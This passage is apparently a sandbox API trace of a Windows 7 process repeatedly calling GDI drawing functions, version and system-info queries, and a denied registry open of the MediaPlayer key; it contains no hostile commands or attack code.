lpPaint=0x1817cc) returned 0x0 [0087.812] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.812] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.812] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.812] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.812] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.812] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe80401cd [0087.812] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe60401d0 [0087.812] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c18 [0087.813] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c19 [0087.813] CombineRgn (hrgnDst=0x1040c18, hrgnSrc1=0xe80401cd, hrgnSrc2=0xe60401d0, iMode=1) returned 1 [0087.813] CombineRgn (hrgnDst=0x1040c19, hrgnSrc1=0xe80401cd, hrgnSrc2=0xe60401d0, iMode=4) returned 2 [0087.813] CreateSolidBrush (color=0xff) returned 0x2100c17 [0087.813] CreateSolidBrush (color=0xff0000) returned 0x1100c1a [0087.813] DeleteObject (ho=0x1100c1a) returned 1 [0087.813] DeleteObject (ho=0xe60401d0) returned 1 [0087.813] DeleteObject (ho=0xe80401cd) returned 1 [0087.813] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.813] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.813] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.813] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.813] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.813] BeginPath (hdc=0x0) returned 0 [0087.813] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.813] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.813] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.813] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.813] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.813] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.813] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.813] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.813] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe70401d0 [0087.813] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe90401cd [0087.813] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c1b [0087.813] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c1c [0087.813] CombineRgn (hrgnDst=0x1040c1b, hrgnSrc1=0xe70401d0, hrgnSrc2=0xe90401cd, iMode=1) returned 1 [0087.813] CombineRgn (hrgnDst=0x1040c1c, hrgnSrc1=0xe70401d0, hrgnSrc2=0xe90401cd, iMode=4) returned 2 [0087.813] CreateSolidBrush (color=0xff) returned 0x2100c1a [0087.813] CreateSolidBrush (color=0xff0000) returned 0x1100c1d [0087.813] DeleteObject (ho=0x1100c1d) returned 1 [0087.813] DeleteObject (ho=0xe90401cd) returned 1 [0087.813] DeleteObject (ho=0xe70401d0) returned 1 [0087.813] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.813] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.813] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.813] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.813] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.813] BeginPath (hdc=0x0) returned 0 [0087.813] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.813] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.813] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.813] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.814] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.814] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.814] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.814] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.814] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xea0401cd [0087.814] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe80401d0 [0087.814] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c1e [0087.814] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c1f [0087.814] CombineRgn (hrgnDst=0x1040c1e, hrgnSrc1=0xea0401cd, hrgnSrc2=0xe80401d0, iMode=1) returned 1 [0087.814] CombineRgn (hrgnDst=0x1040c1f, hrgnSrc1=0xea0401cd, hrgnSrc2=0xe80401d0, iMode=4) returned 2 [0087.814] CreateSolidBrush (color=0xff) returned 0x2100c1d [0087.814] CreateSolidBrush (color=0xff0000) returned 0x1100c20 [0087.814] DeleteObject (ho=0x1100c20) returned 1 [0087.814] DeleteObject (ho=0xe80401d0) returned 1 [0087.814] DeleteObject (ho=0xea0401cd) returned 1 [0087.814] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.814] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.814] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.814] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.814] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.814] BeginPath (hdc=0x0) returned 0 [0087.814] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.814] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.814] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.814] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.814] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.814] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.814] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.814] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.814] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe90401d0 [0087.814] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xeb0401cd [0087.814] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c21 [0087.814] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c22 [0087.814] CombineRgn (hrgnDst=0x1040c21, hrgnSrc1=0xe90401d0, hrgnSrc2=0xeb0401cd, iMode=1) returned 1 [0087.814] CombineRgn (hrgnDst=0x1040c22, hrgnSrc1=0xe90401d0, hrgnSrc2=0xeb0401cd, iMode=4) returned 2 [0087.814] CreateSolidBrush (color=0xff) returned 0x2100c20 [0087.815] CreateSolidBrush (color=0xff0000) returned 0x1100c23 [0087.815] DeleteObject (ho=0x1100c23) returned 1 [0087.815] DeleteObject (ho=0xeb0401cd) returned 1 [0087.815] DeleteObject (ho=0xe90401d0) returned 1 [0087.815] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.815] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.815] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.815] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.815] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.815] BeginPath (hdc=0x0) returned 0 [0087.815] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.815] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.815] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.815] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.815] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.815] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.815] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.815] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.815] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xec0401cd [0087.815] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xea0401d0 [0087.815] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c24 [0087.815] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c25 [0087.815] CombineRgn (hrgnDst=0x1040c24, hrgnSrc1=0xec0401cd, hrgnSrc2=0xea0401d0, iMode=1) returned 1 [0087.815] CombineRgn (hrgnDst=0x1040c25, hrgnSrc1=0xec0401cd, hrgnSrc2=0xea0401d0, iMode=4) returned 2 [0087.815] CreateSolidBrush (color=0xff) returned 0x2100c23 [0087.815] CreateSolidBrush (color=0xff0000) returned 0x1100c26 [0087.815] DeleteObject (ho=0x1100c26) returned 1 [0087.815] DeleteObject (ho=0xea0401d0) returned 1 [0087.815] DeleteObject (ho=0xec0401cd) returned 1 [0087.815] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.815] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.815] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.815] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.815] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.815] BeginPath (hdc=0x0) returned 0 [0087.815] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.815] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.815] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.815] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.816] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.816] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.816] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.816] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.816] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xeb0401d0 [0087.816] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xed0401cd [0087.816] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c27 [0087.816] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c28 [0087.816] CombineRgn (hrgnDst=0x1040c27, hrgnSrc1=0xeb0401d0, hrgnSrc2=0xed0401cd, iMode=1) returned 1 [0087.816] CombineRgn (hrgnDst=0x1040c28, hrgnSrc1=0xeb0401d0, hrgnSrc2=0xed0401cd, iMode=4) returned 2 [0087.816] CreateSolidBrush (color=0xff) returned 0x2100c26 [0087.816] CreateSolidBrush (color=0xff0000) returned 0x1100c29 [0087.816] DeleteObject (ho=0x1100c29) returned 1 [0087.816] DeleteObject (ho=0xed0401cd) returned 1 [0087.816] DeleteObject (ho=0xeb0401d0) returned 1 [0087.816] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.816] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.816] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.816] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.816] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.816] BeginPath (hdc=0x0) returned 0 [0087.816] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.816] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.816] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.816] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.816] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.816] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.816] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.816] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.816] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xee0401cd [0087.816] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xec0401d0 [0087.816] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c2a [0087.816] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c2b [0087.816] CombineRgn (hrgnDst=0x1040c2a, hrgnSrc1=0xee0401cd, hrgnSrc2=0xec0401d0, iMode=1) returned 1 [0087.817] CombineRgn (hrgnDst=0x1040c2b, hrgnSrc1=0xee0401cd, hrgnSrc2=0xec0401d0, iMode=4) returned 2 [0087.817] CreateSolidBrush (color=0xff) returned 0x2100c29 [0087.817] CreateSolidBrush (color=0xff0000) returned 0x1100c2c [0087.817] DeleteObject (ho=0x1100c2c) returned 1 [0087.817] DeleteObject (ho=0xec0401d0) returned 1 [0087.817] DeleteObject (ho=0xee0401cd) returned 1 [0087.817] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.817] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.817] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.817] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.817] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.817] BeginPath (hdc=0x0) returned 0 [0087.817] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.817] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.817] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.817] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.817] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.817] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.817] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.817] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.817] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xed0401d0 [0087.817] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xef0401cd [0087.817] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c2d [0087.817] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c2e [0087.817] CombineRgn (hrgnDst=0x1040c2d, hrgnSrc1=0xed0401d0, hrgnSrc2=0xef0401cd, iMode=1) returned 1 [0087.817] CombineRgn (hrgnDst=0x1040c2e, hrgnSrc1=0xed0401d0, hrgnSrc2=0xef0401cd, iMode=4) returned 2 [0087.817] CreateSolidBrush (color=0xff) returned 0x2100c2c [0087.817] CreateSolidBrush (color=0xff0000) returned 0x1100c2f [0087.817] DeleteObject (ho=0x1100c2f) returned 1 [0087.817] DeleteObject (ho=0xef0401cd) returned 1 [0087.817] DeleteObject (ho=0xed0401d0) returned 1 [0087.817] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.817] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.817] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.817] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.817] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.817] BeginPath (hdc=0x0) returned 0 [0087.817] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.817] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.817] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.817] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.817] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.817] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.818] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.818] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.818] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf00401cd [0087.818] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xee0401d0 [0087.818] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c30 [0087.818] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c31 [0087.818] CombineRgn (hrgnDst=0x1040c30, hrgnSrc1=0xf00401cd, hrgnSrc2=0xee0401d0, iMode=1) returned 1 [0087.818] CombineRgn (hrgnDst=0x1040c31, hrgnSrc1=0xf00401cd, hrgnSrc2=0xee0401d0, iMode=4) returned 2 [0087.818] CreateSolidBrush (color=0xff) returned 0x2100c2f [0087.818] CreateSolidBrush (color=0xff0000) returned 0x1100c32 [0087.818] DeleteObject (ho=0x1100c32) returned 1 [0087.818] DeleteObject (ho=0xee0401d0) returned 1 [0087.818] DeleteObject (ho=0xf00401cd) returned 1 [0087.818] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.818] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.818] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.818] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.818] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.818] BeginPath (hdc=0x0) returned 0 [0087.818] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.818] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.818] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.818] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.818] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.818] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.818] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.818] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.818] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xef0401d0 [0087.818] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf10401cd [0087.818] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c33 [0087.818] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 